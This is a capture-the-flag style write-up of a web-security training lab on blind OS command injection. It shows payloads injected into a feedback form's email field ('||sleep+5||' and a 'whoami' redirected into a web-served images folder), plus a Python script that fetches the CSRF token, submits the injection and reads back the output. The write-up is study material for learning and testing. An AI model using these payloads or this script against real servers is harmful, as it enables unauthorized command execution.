3. Blind OS command injection with output redirection

Lets open the vulnerable lab:

Move around:

We have this post request and those parameters, lets test those parameters to see if we have blind command injection:

||sleep+5||

As we can see the email parameter is vulnerable, lets redirect whoami command to the directory mentioned in the objective above:

||whoami+>+/var/www/images/whoami.txt||

Lets go back to enumerate the website:

Lets try to open the images in a new tab:

As we can see maybe it fetches the photos from the directory we redirected the whoami command to, lets try:

As we can see we retrieved the output.

Solve it using a python3 script:

import requests  
import os  
import sys  
import re  
  
proxies = {  
    "http": "http://127.0.0.1:8080",  
    "https": "http://127.0.0.1:8080"  
}  
  
session = requests.session()  
  
  
def CommandInjection():  
    print("[*] Get CSRF Token.")  
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "feedback").text)  
    print("[*] Perform Command Injection.")  
    headers = {"Content-Type": "application/x-www-form-urlencoded"}  
    data = f"csrf={csrf[0]}&name=test&email=test@test.com||whoami+>+/var/www/images/whoami.txt||&subject=test&message=test"  
    session.post(url=url + "feedback/submit", headers=headers, data=data)  
    print(session.get(url=url + "image?filename=whoami.txt").text)  
  
  
if __name__ == "__main__":  
    if len(sys.argv) != 2:  
        script_name = os.path.basename(__file__)  
        print(f"[-] Usage: python {script_name} http://localhost/")  
        sys.exit(1)  
    url = sys.argv[1]  
    CommandInjection()  
    print("[+] Solved.")
p

Previous2. Blind OS command injection with time delays NextHackTheBox

Last updated 4 months ago